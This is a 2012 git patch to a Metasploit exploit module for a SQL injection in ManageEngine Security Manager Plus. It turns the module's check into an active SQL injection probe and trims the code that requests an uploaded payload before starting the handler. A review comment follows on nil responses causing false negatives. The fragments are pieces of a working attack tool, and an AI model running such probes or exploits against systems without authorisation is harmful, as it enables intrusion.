From f9bb910c3bd4e7d962ea1c8b61fa6913cd75451c Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Tue, 23 Oct 2012 19:42:36 -0500
Subject: [PATCH] Make the check() try SQLI
---
 .../exploits/multi/http/manageengine_search_sqli.rb | 12 +++++-------
 1 file changed, 5 insertions(+), 7 deletions(-)
diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb
index 6e79783ad2..c660de1ea4 100644
--- a/modules/exploits/multi/http/manageengine_search_sqli.rb
+++ b/modules/exploits/multi/http/manageengine_search_sqli.rb
@@ -52,14 +52,11 @@ class Metasploit3 < Msf::Exploit::Remote
 end
- #
- # A very gentle check to see if Security Manager Plus exists or not
- #
 def check
- res = send_request_raw({'uri' => '/SecurityManager.cc'})
+ res = sqli_exec(Rex::Text.rand_text_alpha(1))
- if res and res.body =~ /\SecurityManager Plus\<\/title\>/
- return Exploit::CheckCode::Detected
+ if res and res.body =~ /Error during search/
+ return Exploit::CheckCode::Appears
 else
 return Exploit::CheckCode::Safe
 end
@@ -82,6 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 res = send_request_raw({'uri'=>"/#{rnd_fname}"})
+ # What @@version returns:
 # Linux = 5.0.36-enterprise
 # Windows = 5.0.36-enterprise-nt
@@ -248,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote
 fname = "/#{File.basename(out)}"
 print_status("#{rhost}:#{rport} - Requesting #{fname}")
- res = send_request_raw({'uri' => fname})
+ send_request_raw({'uri' => fname})
 handler
 end
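Review bot: In the first hunk, `check` falls through to `Exploit::CheckCode::Safe` whenever `res` is nil, so a timeout or dropped connection is reported the same as a host that is not vulnerable. Anyone using the check to confirm remediation would get a false negative; a guard such as `return Exploit::CheckCode::Unknown unless res` before the body match would keep "no answer" separate from "not affected". The commit also deletes the header comment that described the check as very gentle and adds nothing in its place, although the check is now active and sends a request through `sqli_exec`. A replacement such as `# Active check: sends a search request via sqli_exec and looks for the application's search error` would tell operators what traffic it generates. `sqli_exec` is defined outside this hunk, so its return value on failure is inferred rather than visible here.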